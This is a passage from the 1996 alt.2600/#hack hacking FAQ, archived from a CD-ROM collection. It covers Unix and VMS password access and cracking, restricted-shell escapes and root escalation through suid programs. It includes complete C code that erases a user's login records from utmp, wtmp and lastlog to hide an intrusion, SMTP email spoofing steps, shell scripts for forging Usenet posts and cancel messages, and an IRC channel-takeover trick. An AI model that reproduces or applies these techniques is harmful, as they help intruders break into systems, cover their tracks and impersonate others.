home *** CD-ROM | disk | FTP | other *** search
/ Hacker's Secrets 4 / Hacker's Secrets 4.iso / faq / alt197.txt < prev    next >
Text File  |  1997-01-06  |  256KB  |  6,864 lines

  1. Subject: alt.2600 FAQ, Beta .013 - Part 1/1
  2. Date: 30 Jul 1996 11:18:53 -0000
  3. Summary: This posting contains a list of Frequently Asked
  4. . Questions (and their answers) about hacking.  It
  5. . should be read by anyone who wishes to post to the
  6. . alt.2600 newsgroup or use the IRC channel #hack.
  7.  
  8. Archive-Name: alt-2600/faq
  9. Posting-Frequency: Random
  10. Last-Modified: 1996/01/07
  11. Version: Beta .013
  12.  
  13.  
  14.         Welcome to Beta .013 of the alt.2600/#hack FAQ!
  15.  
  16.         The purpose of this FAQ is to give you a general introduction
  17.         to the topics covered in alt.2600 and #hack.  No document will
  18.         make you a hacker.
  19.  
  20.         If you have a question regarding any of the topics covered in
  21.         the FAQ, please direct it to alt.2600.  Please do not e-mail me
  22.         with them, I do not have time to respond to each request
  23.         personally.
  24.  
  25.         If your copy of the alt.2600/#hack FAQ does not end with the
  26.         letters EOT on a line by themselves, you do not have the entire
  27.         FAQ.
  28.  
  29.         If you do not have the entire FAQ, retrieve it from one of
  30.         these sites:
  31.  
  32.         Get it on FTP at:
  33.         rahul.net         /pub/lps/sysadmin/
  34.         rtfm.mit.edu      /pub/usenet-by-group/alt.2600/
  35.         clark.net         /pub/jcase/
  36.         mirrors.aol.com   /pub/rtfm/usenet-by-group/alt.2600/
  37.         ftp.winternet.com /users/nitehwk/phreak/
  38.  
  39.         Get it on the World Wide Web at:
  40.         www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
  41.  
  42.         Get it on my BBS:
  43.         Hacker's Haven (303)343-4053
  44.  
  45.  
  46.            
  47.  
  48.  
  49.                                  The
  50.  
  51.                         alt.2600/#Hack F.A.Q.
  52.  
  53.                           Beta Revision .013
  54.  
  55.                    A TNO Communications Production
  56.  
  57.                                  by
  58.                                Voyager
  59.                          will@gnu.ai.mit.edu
  60.  
  61.                               Sysop of
  62.                            Hacker's Haven
  63.                            (303)343-4053
  64.  
  65.  
  66.                           Greets go out to:
  67.  
  68.         A-Flat, Al, Aleph1, Bluesman, Cavalier, Cruiser, Cybin, C-Curve,
  69.         DeadKat, Disorder, Edison, Frosty, Glen Roberts, Hobbit,
  70.         Holistic Hacker, KCrow, Major, Marauder, Novocain, Outsider,
  71.         Per1com, Presence, Rogue Agent, Route, sbin, Taran King, Theora,
  72.         ThePublic, Tomes, and TheSaint.
  73.  
  74.  
  75.  
  76.            We work in the dark
  77.            We do what we can
  78.            We give what we have
  79.            Our doubt is our passion, and our passion is our task
  80.            The rest is the madness of art.
  81.  
  82.                      -- Henry James
  83.  
  84.  
  85.            When I picture a perfect reader, I always picture a
  86.            monster of courage and curiosity, also something
  87.            supple, cunning, cautious, a born adventurer and
  88.            discoverer...
  89.  
  90.                      -- Friedreich Nietzsche
  91.  
  92.  
  93.  
  94.  
  95.  
  96. Section A: Computers
  97.  
  98.   01. How do I access the password file under Unix?
  99.   02. How do I crack Unix passwords?
  100.   03. What is password shadowing?
  101.   04. Where can I find the password file if it's shadowed?
  102.   05. What is NIS/yp?
  103.   06. What are those weird characters after the comma in my passwd file?
  104.   07. How do I access the password file under VMS?
  105.   08. How do I crack VMS passwords?
  106.   09. What can be logged on a VMS system?
  107.   10. What privileges are available on a VMS system?
  108.   11. How do I break out of a restricted shell?
  109.   12. How do I gain root from a suid script or program?
  110.   13. How do I erase my presence from the system logs?
  111. U 14. How do I send fakemail?
  112.   15. How do I fake posts and control messages to UseNet?
  113.   16. How do I hack ChanOp on IRC?
  114. U 17. How do I modify the IRC client to hide my real username?
  115.   18. How to I change to directories with strange characters in them?
  116. U 19. What is ethernet sniffing?
  117.   20. What is an Internet Outdial?
  118.   21. What are some Internet Outdials?
  119. U 22. What is this system?
  120. U 23. What are the default accounts for XXX ?
  121.   24. What port is XXX on?
  122.   25. What is a trojan/worm/virus/logic bomb?
  123.   26. How can I protect myself from viruses and such?
  124.   27. Where can I get more information about viruses?
  125.   28. What is Cryptoxxxxxxx?
  126.   29. What is PGP?
  127.   30. What is Tempest?
  128.   31. What is an anonymous remailer?
  129. U 32. What are the addresses of some anonymous remailers?
  130.   33. How do I defeat copy protection?
  131.   34. What is 127.0.0.1?
  132.   35. How do I post to a moderated newsgroup?
  133. U 36. How do I post to Usenet via e-mail?
  134.   37. How do I defeat a BIOS password?
  135. N 38. What is the password for <encrypted file>?
  136. N 39. Is there any hope of a decompiler that would convert an executable
  137.       program into C/C++ code?
  138. N 40. How does the MS-Windows password encryption work?
  139.  
  140. Section B: Telephony
  141.  
  142. U 01. What is a Red Box?
  143.   02. How do I build a Red Box?
  144.   03. Where can I get a 6.5536Mhz crystal?
  145.   04. Which payphones will a Red Box work on?
  146.   05. How do I make local calls with a Red Box?
  147.   06. What is a Blue Box?
  148.   07. Do Blue Boxes still work?
  149.   08. What is a Black Box?
  150.   09. What do all the colored boxes do?
  151.   10. What is an ANAC number?
  152. U 11. What is the ANAC number for my area?
  153.   12. What is a ringback number?
  154. U 13. What is the ringback number for my area?
  155.   14. What is a loop?
  156. U 15. What is a loop in my area?
  157. U 16. What is a CNA number?
  158.   17. What is the telephone company CNA number for my area?
  159. U 18. What are some numbers that always ring busy?
  160. U 19. What are some numbers that temporarily disconnect phone service?
  161. U 20. What is a Proctor Test Set?
  162. U 21. What is a Proctor Test Set in my area?
  163.   22. What is scanning?
  164.   23. Is scanning illegal?
  165. U 24. Where can I purchase a lineman's handset?
  166.   25. What are the DTMF frequencies?
  167.   26. What are the frequencies of the telephone tones?
  168. U 27. What are all of the * (LASS) codes?
  169.   28. What frequencies do cordless phones operate on?
  170.   29. What is Caller-ID?
  171.   30. How do I block Caller-ID?
  172.   31. What is a PBX?
  173.   32. What is a VMB?
  174.   33. What are the ABCD tones for?
  175. N 34. What are the International Direct Numbers?
  176.  
  177. Section C: Cellular
  178.  
  179. N 01. What is an MTSO?
  180. N 02. What is a NAM?
  181. N 03. What is an ESN?
  182. N 04. What is an MIN?
  183. N 05. What is a SCN?
  184. N 06. What is a SIDH?
  185. N 07. What are the forward/reverse channels?
  186.  
  187. Section D: Resources
  188.  
  189.   01. What are some ftp sites of interest to hackers?
  190.   02. What are some fsp sites of interest to hackers?
  191. U 03. What are some newsgroups of interest to hackers?
  192. U 04. What are some telnet sites of interest to hackers?
  193. U 05. What are some gopher sites of interest to hackers?
  194. U 06. What are some World wide Web (WWW) sites of interest to hackers?
  195.   07. What are some IRC channels of interest to hackers?
  196. U 08. What are some BBS's of interest to hackers?
  197. U 09. What are some books of interest to hackers?
  198. U 10. What are some videos of interest to hackers?
  199. U 11. What are some mailing lists of interest to hackers?
  200. U 12. What are some print magazines of interest to hackers?
  201. U 13. What are some e-zines of interest to hackers?
  202. U 14. What are some organizations of interest to hackers?
  203. U 15. What are some radio programs of interest to hackers?
  204. N 16. What are other FAQ's of interest to hackers?
  205.   17. Where can I purchase a magnetic stripe encoder/decoder?
  206.   18. What are the rainbow books and how can I get them?
  207.  
  208.  
  209. Section E: 2600
  210.  
  211.   01. What is alt.2600?
  212.   02. What does "2600" mean?
  213.   03. Are there on-line versions of 2600 available?
  214.   04. I can't find 2600 at any bookstores.  What can I do?
  215.   05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  216.  
  217.  
  218. Section F: Miscellaneous
  219.  
  220.   01. What does XXX stand for?
  221.   02. How do I determine if I have a valid credit card number?
  222. U 03. What is the layout of data on magnetic stripe cards?
  223.   04. What are the ethics of hacking?
  224.   05. Where can I get a copy of the alt.2600/#hack FAQ?
  225.  
  226.  
  227.  
  228. U == Updated since last release of the alt.2600/#hack FAQ
  229. N == New since last release of the alt.2600/#hack FAQ
  230.  
  231.  
  232.  
  233.  
  234. Section A: Computers
  235. ~~~~~~~~~~~~~~~~~~~~
  236.  
  237. 01. How do I access the password file under Unix?
  238.  
  239. In standard Unix the password file is /etc/passwd.  On a Unix system
  240. with either NIS/yp or password shadowing, much of the password data may
  241. be elsewhere.  An entry in the password file consists of seven colon
  242. delimited fields:
  243.  
  244. Username
  245. Encrypted password (And optional password aging data)
  246. User number
  247. Group Number
  248. GECOS Information
  249. Home directory
  250. Shell
  251.  
  252. ]
  253. ] Sample entry from /etc/passwd:
  254. ]
  255. ] will:5fg63fhD3d5gh:9406:12:Will Spencer:/home/fsg/will:/bin/bash
  256. ]
  257.  
  258. Broken down, this passwd file line shows:
  259.  
  260.           Username: will
  261. Encrypted password: 5fg63fhD3d5gh
  262.        User number: 9406
  263.       Group Number: 12
  264.  GECOS Information: Will Spencer
  265.     Home directory: /home/fsg/will
  266.              Shell: /bin/bash
  267.  
  268.  
  269. 02. How do I crack Unix passwords?
  270.  
  271. Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
  272. passwords are encrypted with a one way function.  The login program
  273. encrypts the text you enter at the "password:" prompt and compares
  274. that encrypted string against the encrypted form of your password.
  275.  
  276. Password cracking software uses wordlists.  Each word in the wordlist
  277. is encrypted and the results are compared to the encrypted form of the
  278. target password.
  279.  
  280. The best cracking program for Unix passwords is currently Crack by
  281. Alec Muffett.  For PC-DOS, the best package to use is currently
  282. CrackerJack.  CrackerJack is available via ftp from clark.net
  283. /pub/jcase/.
  284.  
  285.  
  286. 03. What is password shadowing?
  287.  
  288. Password shadowing is a security system where the encrypted password
  289. field of /etc/passwd is replaced with a special token and the
  290. encrypted password is stored in a separate file which is not readable
  291. by normal system users.
  292.  
  293. To defeat password shadowing on many (but not all) systems, write a
  294. program that uses successive calls to getpwent() to obtain the
  295. password file.
  296.  
  297. Example:
  298.  
  299. #include <pwd.h>
  300. main()
  301. {
  302. struct passwd *p;
  303. while(p=getpwent())
  304. printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
  305. p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
  306. }
  307.  
  308.  
  309. 04. Where can I find the password file if it's shadowed?
  310.  
  311. Unix                  Path                            Token
  312. -----------------------------------------------------------------
  313. AIX 3                 /etc/security/passwd            !
  314.        or             /tcb/auth/files/<first letter   #
  315.                             of username>/<username>
  316. A/UX 3.0s             /tcb/files/auth/?/*
  317. BSD4.3-Reno           /etc/master.passwd              *
  318. ConvexOS 10           /etc/shadpw                     *
  319. ConvexOS 11           /etc/shadow                     *
  320. DG/UX                 /etc/tcb/aa/user/               *
  321. EP/IX                 /etc/shadow                     x
  322. HP-UX                 /.secure/etc/passwd             *
  323. IRIX 5                /etc/shadow                     x
  324. Linux 1.1             /etc/shadow                     *
  325. OSF/1                 /etc/passwd[.dir|.pag]          *
  326. SCO Unix #.2.x        /tcb/auth/files/<first letter   *
  327.                             of username>/<username>
  328. SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
  329. SunOS 5.0             /etc/shadow
  330.                       <optional NIS+ private secure maps/tables/whatever>
  331. System V Release 4.0  /etc/shadow                     x
  332. System V Release 4.2  /etc/security/* database
  333. Ultrix 4              /etc/auth[.dir|.pag]            *
  334. UNICOS                /etc/udb                        *
  335.  
  336.  
  337. 05. What is NIS/yp?
  338.  
  339. NIS (Network Information System) in the current name for what was once
  340. known as yp (Yellow Pages).  The purpose for NIS is to allow many
  341. machines on a network to share configuration information, including
  342. password data.  NIS is not designed to promote system security.  If
  343. your system uses NIS you will have a very short /etc/passwd file that
  344. includes a line that looks like this:
  345.  
  346. +::0:0:::
  347.  
  348. To view the real password file use this command "ypcat passwd"
  349.  
  350.  
  351. 06. What are those weird characters after the comma in my passwd file?
  352.  
  353. The characters are password aging data.  Password aging forces the
  354. user to change passwords after a System Administrator specified period
  355. of time.  Password aging can also force a user to keep a password for
  356. a certain number of weeks before changing it.
  357.  
  358. ]
  359. ] Sample entry from /etc/passwd with password aging installed:
  360. ]
  361. ] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
  362. ]
  363.  
  364. Note the comma in the encrypted password field.  The characters after
  365. the comma are used by the password aging mechanism.
  366.  
  367. ]
  368. ] Password aging characters from above example:
  369. ]
  370. ] M.z8
  371. ]
  372.  
  373. The four characters are interpreted as follows:
  374.  
  375.   1: Maximum number of weeks a password can be used without changing.
  376.   2: Minimum number of weeks a password must be used before changing.
  377. 3&4: Last time password was changed, in number of weeks since 1970.
  378.  
  379. Three special cases should be noted:
  380.  
  381. If the first and second characters are set to '..' the user will be
  382. forced to change his/her passwd the next time he/she logs in.  The
  383. passwd program will then remove the passwd aging characters, and the
  384. user will not be subjected to password aging requirements again.
  385.  
  386. If the third and fourth characters are set to '..' the user will be
  387. forced to change his/her passwd the next time he/she logs in. Password
  388. aging will then occur as defined by the first and second characters.
  389.  
  390. If the first character (MAX) is less than the second character (MIN),
  391. the user is not allowed to change his/her password.  Only root can
  392. change that users password.
  393.  
  394. It should also be noted that the su command does not check the password
  395. aging data.  An account with an expired password can be su'd to
  396. without being forced to change the password.
  397.  
  398.  
  399.                         Password Aging Codes
  400. +------------------------------------------------------------------------+
  401. |                                                                        |
  402. | Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
  403. |    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
  404. |                                                                        |
  405. | Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |
  406. |    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
  407. |                                                                        |
  408. | Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |
  409. |    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
  410. |                                                                        |
  411. | Character:  w  x  y  z                                                 |
  412. |    Number: 60 61 62 63                                                 |
  413. |                                                                        |
  414. +------------------------------------------------------------------------+
  415.  
  416.  
  417. 07. How do I access the password file under VMS?
  418.  
  419. Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
  420. unlike Unix, most users do not have access to read the password file.
  421.  
  422.  
  423. 08. How do I crack VMS passwords?
  424.  
  425. Write a program that uses the SYS$GETUAF functions to compare the
  426. results of encrypted words against the encrypted data in SYSUAF.DAT.
  427.  
  428. Two such programs are known to exist, CHECK_PASSWORD and
  429. GUESS_PASSWORD.
  430.  
  431.  
  432. 09. What can be logged on a VMS system?
  433.  
  434. Virtually every aspect of the VMS system can be logged for
  435. investigation.  To determine the status of the accounting on your system
  436. use the command SHOW ACCOUNTING.  System accounting is a facility for
  437. recording information about the use of the machine from a system
  438. accounting perspective (resource logging such as CPU time, printer usage
  439. etc.), while system auditing is done with the aim of logging information
  440. for the purpose of security.  To enable accounting:
  441.  
  442. $ SET ACCOUNTING  [/ENABLE=(Activity...)] 
  443.  
  444. This enables accounting logging information to the accounting log
  445. file SYS$MANAGER:ACCOUNTING.DAT.  This also is used to close
  446. the current log file and open a new one with a higher version
  447. number. 
  448.  
  449. The following activities can be logged:
  450.  
  451.         BATCH                   Termination of a batch job
  452.         DETACHED                Termination of a detached job
  453.         IMAGE                   Image execution
  454.         INTERACTIVE             Interactive job termination
  455.         LOGIN_FAILURE           Login failures
  456.         MESSAGE                 Users messages
  457.         NETWORK                 Network job termination
  458.         PRINT                   Print Jobs
  459.         PROCESS                 Any terminated process
  460.         SUBPROCESS              Termination of  a subprocess
  461.  
  462. To enable security auditing use:
  463.  
  464.         $ SET AUDIT [/ENABLE=(Activity...)]
  465.  
  466. The /ALARM qualifier is used to raise an alarm to all terminals approved
  467. as security operators, which means that you need the SECURITY
  468. privileges.  You can determine your security auditing configuration
  469. using $ SHOW AUDIT /ALL
  470.  
  471. The security auditor can be configured to log the following
  472. activities: 
  473.  
  474.         ACL                     Access Control List requested events
  475.         AUTHORIZATION           Modification to the system user
  476.                                 authorization file  SYS$SYSTEM:SYSUAF.DAT
  477.         BREAKIN                 Attempted Break-ins
  478.         FILE_ACCESS             File or global section access
  479.         INSTALL                 Occurrence of any INSTALL operations
  480.         LOGFAILURE              Any login failures
  481.         LOGIN                   A login attempt from various sources
  482. .LOGOUT                  Logouts 
  483.         MOUNT                   Mount or dismount requests
  484.  
  485.  
  486. 10. What privileges are available on a VMS system?
  487.   
  488. ACNT            Allows you to restrain accounting messages
  489. ALLSPOOL        Allows you to allocate spooled devices
  490. ALTPRI          Allot Priority.  This allows you to set any priority
  491.                 value
  492. BUGCHK          Allows you make bug check error log entries
  493. BYPASS          Enables you to disregard protections
  494. CMEXEC/  
  495. CMKRNL          Change to executive or kernel mode.  These privileges
  496.                 allow a process to execute optional routines with KERNEL
  497.                 and EXECUTIVE access modes. CMKRNL is the most powerful
  498.                 privilege on VMS as anything protected can be accessed
  499.                 if you have this privilege.  You must have these
  500.                 privileges to gain access to the kernel data structures
  501.                 directly.
  502. DETACH          This privilege allow you to create detached processes of
  503.                 arbitrary UICs
  504. DIAGNOSE        With this privilege you can diagnose devices
  505. EXQUOTA         Allows you to exceed your disk quota
  506. GROUP           This privilege grants you permission to  affect other
  507.                 processes in the same rank
  508. GRPNAM          Allows you to insert group logical names into the group
  509.                 logical names table.
  510. GRPPRV          Enables you to access system group objects through
  511.                 system protection field
  512. LOG_IO          Allows you to issue logical input output requests
  513. MOUNT           May execute the mount function
  514. NETMBX          Allows you to create network connections
  515. OPER            Allows you to perform operator functions
  516. PFNMAP          Allows you to map to specific physical pages
  517. PHY_IO          Allows you to perform physical input output requests
  518. PRMCEB          Can create permanent common event clusters
  519. PRMGBL          Allows you to create permanent global sections
  520. PRMMBX          Allows you to create permanent mailboxes
  521. PSWAPM          Allows you to change a processes swap mode
  522. READALL         Allows you read access to everything
  523. SECURITY        Enables you to perform security  related functions
  524. SETPRV          Enable all privileges
  525. SHARE           Allows you to access devices allocated to other users.
  526.                 This is used to assign system mailboxes.
  527. SHMEM           Enables you to modify objects in shared memory
  528. SYSGBL          Allows you to create system wide permanent global
  529.                 sections
  530. SYSLCK          Allows you to lock system wide resources
  531. SYSNAM          Allows you to insert in system logical names in the
  532.                 names table.
  533. SYSPRV          If a process holds this privilege then it is the same as
  534.                 a process holding the system user identification code.
  535. TMPMBX          Allows you create temporary mailboxes
  536. VOLPRO          Enables you to override volume protection
  537. WORLD           When this is set you can affect other processes in the
  538.                 world
  539.   
  540. To determine what privileges your process is running with issue the command:
  541.   
  542. $ show proc/priv   
  543.  
  544.  
  545. 11. How do I break out of a restricted shell?
  546.  
  547. On poorly implemented restricted shells you can break out of the
  548. restricted environment by running a program that features a shell
  549. function.  A good example is vi.  Run vi and use this command:
  550.  
  551. :set shell=/bin/sh
  552.  
  553. then shell using this command:
  554.  
  555. :shell
  556.  
  557. If your restricted shell prevents you from using the "cd" command, ftp
  558. into your account and you may be able to cd.
  559.  
  560.  
  561. 12. How do I gain root from a suid script or program?
  562.  
  563. 1. Change IFS.
  564.  
  565. If the program calls any other programs using the system() function
  566. call, you may be able to fool it by changing IFS.  IFS is the Internal
  567. Field Separator that the shell uses to delimit arguments.
  568.  
  569. If the program contains a line that looks like this:
  570.  
  571. system("/bin/date")
  572.  
  573. and you change IFS to '/' the shell will them interpret the
  574. proceeding line as:
  575.  
  576. bin date
  577.  
  578. Now, if you have a program of your own in the path called "bin" the
  579. suid program will run your program instead of /bin/date.
  580.  
  581. To change IFS, use this command:
  582.  
  583. IFS='/';export IFS      # Bourne Shell
  584. setenv IFS '/'          # C Shell
  585. export IFS='/'          # Korn Shell
  586.  
  587.  
  588. 2. link the script to -i
  589.  
  590. Create a symbolic link named "-i" to the program.  Running "-i"
  591. will cause the interpreter shell (/bin/sh) to start up in interactive
  592. mode.  This only works on suid shell scripts.
  593.  
  594. Example:
  595.  
  596. % ln suid.sh -i
  597. % -i
  598. #
  599.  
  600.  
  601. 3. Exploit a race condition
  602.  
  603. Replace a symbolic link to the program with another program while the
  604. kernel is loading /bin/sh.
  605.  
  606. Example:
  607.  
  608. nice -19 suidprog ; ln -s evilprog suidroot
  609.  
  610.  
  611. 4. Send bad input to the program.
  612.  
  613. Invoke the name of the program and a separate command on the same
  614. command line.
  615.  
  616. Example:
  617.  
  618. suidprog ; id
  619.  
  620.  
  621. 13. How do I erase my presence from the system logs?
  622.  
  623. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
  624. files that can be edited by hand with vi, you must use a program
  625. specifically written for this purpose.
  626.  
  627. Example:
  628.  
  629. #include <sys/types.h>
  630. #include <stdio.h>
  631. #include <unistd.h>
  632. #include <sys/file.h>
  633. #include <fcntl.h>
  634. #include <utmp.h>
  635. #include <pwd.h>
  636. #include <lastlog.h>
  637. #define WTMP_NAME "/usr/adm/wtmp"
  638. #define UTMP_NAME "/etc/utmp"
  639. #define LASTLOG_NAME "/usr/adm/lastlog"
  640.  
  641. int f;
  642.  
  643. void kill_utmp(who)
  644. char *who;
  645. {
  646.     struct utmp utmp_ent;
  647.  
  648.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  649.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  650.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  651.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  652.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  653.                  write (f, &utmp_ent, sizeof (utmp_ent));
  654.             }
  655.      close(f);
  656.   }
  657. }
  658.  
  659. void kill_wtmp(who)
  660. char *who;
  661. {
  662.     struct utmp utmp_ent;
  663.     long pos;
  664.  
  665.     pos = 1L;
  666.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  667.  
  668.      while(pos != -1L) {
  669.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  670.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  671.           pos = -1L;
  672.         } else {
  673.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  674.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  675.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  676.                write (f, &utmp_ent, sizeof (utmp_ent));
  677.                pos = -1L;
  678.           } else pos += 1L;
  679.         }
  680.      }
  681.      close(f);
  682.   }
  683. }
  684.  
  685. void kill_lastlog(who)
  686. char *who;
  687. {
  688.     struct passwd *pwd;
  689.     struct lastlog newll;
  690.  
  691.      if ((pwd=getpwnam(who))!=NULL) {
  692.  
  693.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  694.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  695.             bzero((char *)&newll,sizeof( newll ));
  696.             write(f, (char *)&newll, sizeof( newll ));
  697.             close(f);
  698.         }
  699.  
  700.     } else printf("%s: ?\n",who);
  701. }
  702.  
  703. main(argc,argv)
  704. int argc;
  705. char *argv[];
  706. {
  707.     if (argc==2) {
  708.         kill_lastlog(argv[1]);
  709.         kill_wtmp(argv[1]);
  710.         kill_utmp(argv[1]);
  711.         printf("Zap2!\n");
  712.     } else
  713.     printf("Error.\n");
  714. }
  715.  
  716.  
  717. 14. How do I send fakemail?
  718.  
  719. Telnet to port 25 of the machine you want the mail to appear to
  720. originate from.  Enter your message as in this example:
  721.  
  722.  HELO bellcore.com
  723.  MAIL FROM:voyager@bellcore.com
  724.  RCPT TO:president@whitehouse.gov
  725.  DATA
  726.  From: voyager@bellcore.com (The Voyager)
  727.  To: president@whitehouse.gov
  728.  Subject: Clipper
  729.  Reply-To: voyager@bellcore.com
  730.  
  731. .Please discontinue your silly Clipper initiative.
  732.  .
  733.  QUIT
  734.  
  735. On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
  736. line will not work.  Test by sending yourself fakemail first.
  737.  
  738. For more information read RFC 822 "Standard for the format of ARPA
  739. Internet text messages."
  740.  
  741.  
  742. 15. How do I fake posts and control messages to UseNet?
  743.  
  744.  From: Anonymous (Pretending to be: tale@uunet.uu.net (David C Lawrence))
  745.  Subject: FAQ: Better living through forgery
  746.  Date: 19 Mar 1995 02:37:09 GMT
  747.  
  748. .Anonymous netnews without "anonymous" remailers
  749.  
  750.  Inspired by the recent "NetNews Judges-L" events, this file has been
  751.  updated to cover forging control messages, so you can do your own
  752.  article canceling and create and destroy your own newsgroups.
  753.  
  754.  Save any news article to a file.  We'll call it "hak" in this example.
  755.  
  756.  Edit "hak", and remove any header lines of the form
  757.  
  758.          From some!random!path!user   (note: "From ", not "From: " !!)
  759.          Article:
  760.          Lines:
  761.          Xref:
  762.  
  763.  Shorten the Path: header down to its LAST two or three "bangized"
  764.  components. This is to make the article look like it was posted from
  765.  where it really was posted, and originally hit the net at or near the
  766.  host you send it to.  Or you can construct a completely new Path: line
  767.  to reflect your assumed alias.
  768.  
  769.  Make some change to the Message-ID: field, that isn't likely to be
  770.  duplicated anywhere.  This is usually best done by adding a couple of
  771.  random characters to the part before the @, since news posting programs
  772.  generally use a fixed-length field to generate these IDs.
  773.  
  774.  Change the other headers to say what you like -- From:, Newsgroups:,
  775.  Sender:, etc.  Replace the original message text with your message.  If
  776.  you are posting to a moderated group or posting a control message,
  777.  remember to put in an Approved: header to bypass the moderation
  778.  mechanism.
  779.  
  780.  To specifically cancel someone else's article, you need its message-ID.
  781.  Your message headers, in addition to what's already there, should also
  782.  contain the following with that message-ID in it.  This makes it a
  783.  "control message". NOTE: control messages generally require an
  784.  Approved: header as well, so you should add one.
  785.  
  786.  Subject: cmsg cancel <xb8700A@twits.site.com>
  787.  Control: cancel <xb8700A@twits.site.com>
  788.  Approved: luser@twits.site.com
  789.  
  790.  Newsgroups are created and destroyed with control messages, too.  If
  791.  you wanted to create, for instance, comp.misc.microsoft.sucks, your
  792.  control headers would look like
  793.  
  794.  Subject: cmsg newgroup comp.misc.microsoft.sucks
  795.  Control: newgroup comp.misc.microsoft.sucks
  796.  
  797.  Add on the string "moderated" at the end of these if you want the group
  798.  to be "moderated with no moderator" as with alt.hackers.  Somewhere in
  799.  the body of your message, you should include the following text,
  800.  changed with the description of the group you're creating:
  801.  
  802.  For your newsgroups file:
  803.  comp.misc.microsoft.sucks               We don't do windows
  804.  
  805.  To remove a group, substitute "rmgroup" for "newgroup" in the header
  806.  lines above.  Keep in mind that most sites run all "rmgroup" requests
  807.  through a human news-master, who may or may not decide to honor it.
  808.  Group creation is more likely to be automatic than deletion at most
  809.  installations.  Any newsgroup changes are more likely to take effect if
  810.  the come from me, since my name is hardwired into many of the NNTP
  811.  control scripts, so using the From: and Approved: headers from this
  812.  posting is recommended.
  813.  
  814.  Save your changed article, check it to make sure it contains NO
  815.  reference to yourself or your own site, and send it to your favorite
  816.  NNTP server that permits transfers via the IHAVE command, using the
  817.  following script:
  818.  
  819.  =======================
  820.  #! /bin/sh
  821.  ## Post an article via IHAVE.
  822.  ## args: filename server
  823.  
  824.   if test "$2" = "" ; then
  825.    echo usage: $0 filename server
  826.    exit 1
  827.  fi
  828.  if test ! -f $1 ; then
  829.    echo $1: not found
  830.    exit 1
  831.  fi
  832.  
  833.  # suck msg-id out of headers, keep the brackets
  834.  msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
  835.    sed 's/.*-[Ii][Dd]: //'`
  836.  echo $msgid
  837.  
  838.  ( sleep 5
  839.    echo IHAVE $msgid
  840.    sleep 5
  841.    cat $1
  842.    sleep 1
  843.     echo "."
  844.    sleep 1
  845.    echo QUIT ) | telnet $2 119
  846.  =======================
  847.  
  848.  If your article doesn't appear in a day or two, try a different server.
  849.  They are easy to find.  Here's a script that will break a large file
  850.  full of saved netnews into a list of hosts to try.  Edit the output of
  851.  this if you want, to remove obvious peoples' names and other trash.
  852.  
  853.  =======================
  854.  #! /bin/sh
  855.  FGV='fgrep -i -v'
  856.  egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
  857.  /g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
  858.  =======================
  859.  
  860.  Once you have your host list, feed it to the following script.
  861.  
  862.   =======================
  863.  #! /bin/sh
  864.  
  865.  while read xx ; do
  866.  if test "$xx" = "" ; then continue;
  867.  fi
  868.  echo === $xx
  869.  ( echo open $xx 119
  870.    sleep 5
  871.    echo ihave IamSOk00l@podunk.edu
  872.    sleep 4
  873.    echo .
  874.    echo quit
  875.    sleep 1
  876.    echo quit
  877.  ) | telnet
  878.  done
  879.  =======================
  880.  
  881.  If the above script is called "findem" and you're using csh, you should do
  882.  
  883.          findem < list >& outfile
  884.  
  885.  so that ALL output from telnet is captured.  This takes a long time,
  886.  but when it finishes, edit "outfile" and look for occurrences of "335".
  887.  These mark answers from servers that might be willing to accept an
  888.  article.  This isn't a completely reliable indication, since some
  889.  servers respond with acceptance and later drop articles.  Try a given
  890.  server with a slightly modified repeat of someone else's message, and
  891.  see if it eventually appears.
  892.  
  893.  Sometimes the telnets get into an odd state, and freeze, particularly
  894.  when a host is refusing NNTP connections.  If you manually kill these
  895.  hung telnet processes but not the main script, the script will continue
  896.  on.  In other words, you may have to monitor the finding script a
  897.  little while it is running.
  898.  
  899.  You will notice other servers that don't necessarily take an IHAVE, but
  900.  say "posting ok".  You can probably do regular POSTS through these, but
  901.  they will add an "NNTP-Posting-Host: " header containing the machine
  902.  YOU came from and are therefore unsuitable for completely anonymous
  903.  use.
  904.  
  905.  PLEASE USE THE INFORMATION IN THIS ARTICLE FOR CONSTRUCTIVE PURPOSES ONLY.
  906.  
  907.  
  908. 16. How do I hack ChanOp on IRC?
  909.  
  910. Find a server that is split from the rest of IRC and create your own
  911. channel there using the name of the channel you want ChanOp on.  When
  912. that server reconnects to the net, you will have ChanOp on the real
  913. channel.  If you have ServerOp on a server, you can cause it to split
  914. on purpose.
  915.  
  916.  
